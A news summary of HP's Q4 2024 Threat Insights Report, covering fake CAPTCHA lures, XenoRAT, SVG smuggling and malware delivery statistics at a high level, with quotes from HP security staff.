HP Threat Insights Report Reveals Surge in Fake CAPTCHA Cyberattacks

At its annual Amplify Conference, HP Inc. (NYSE: HPQ) released the latest HP Threat Insights Report, exposing a sharp increase in cyberattacks using fake CAPTCHA verification tests to trick users into compromising their devices. This growing tactic takes advantage of “click tolerance,” a trend where users, accustomed to multi-step authentication, are more likely to follow deceptive prompts.

The report, based on data from millions of endpoints running HP Wolf Security, reveals several advanced attack campaigns. One significant finding is the rise of fake CAPTCHA challenges that lure victims into executing malicious PowerShell commands, leading to the installation of the Lumma Stealer remote access trojan (RAT). Another campaign involves XenoRAT, an open-source malware with surveillance capabilities that grants attackers access to a victim’s webcam and microphone. Using social engineering tactics, cybercriminals convince users to enable macros in Word and Excel documents, giving them control to exfiltrate data, log keystrokes, and spy on users.

The report also highlights a sophisticated attack using SVG smuggling—embedding JavaScript malware inside Scalable Vector Graphics (SVG) images to evade detection. When these images open in a browser, the malware deploys seven different payloads, including RATs and infostealers. Obfuscated Python scripts are also used to install malware, leveraging the language’s widespread availability due to its increasing use in AI and data science applications.

According to Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, these campaigns emphasize how cybercriminals use obfuscation and anti-analysis techniques to evade detection and delay security responses. He notes that simple but effective evasion tactics make it difficult for security tools to identify malicious activity, giving attackers more time to compromise endpoints.

The HP Threat Insights Report analyzes data from Q4 2024 and highlights how cybercriminals are bypassing detection-based security solutions. At least 11% of email threats identified by HP Sure Click evaded one or more email gateway scanners. Executables (43%) were the most common malware delivery method, followed by archive files (32%), showing that attackers continue to use diverse strategies to breach systems.

Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., warns that the rise of multi-step authentication increases click tolerance, making users more vulnerable to multi-stage attacks. He emphasizes that organizations must prioritize shrinking the attack surface by isolating risky user actions rather than relying solely on predictive security measures.

HP Wolf Security isolates threats that evade traditional detection tools, allowing malware to detonate safely in secure containers. This proactive approach gives HP unique insights into emerging cyberattack techniques. To date, HP Wolf Security has protected users who have interacted with over 65 billion email attachments, web pages, and downloaded files—without a single reported breach.

As cyber threats evolve, the report stresses the need for advanced endpoint protection and attack isolation to defend against increasingly sophisticated methods. With the growing use of AI and other emerging technologies, traditional detection-based security tools are no longer enough to combat modern cyber threats.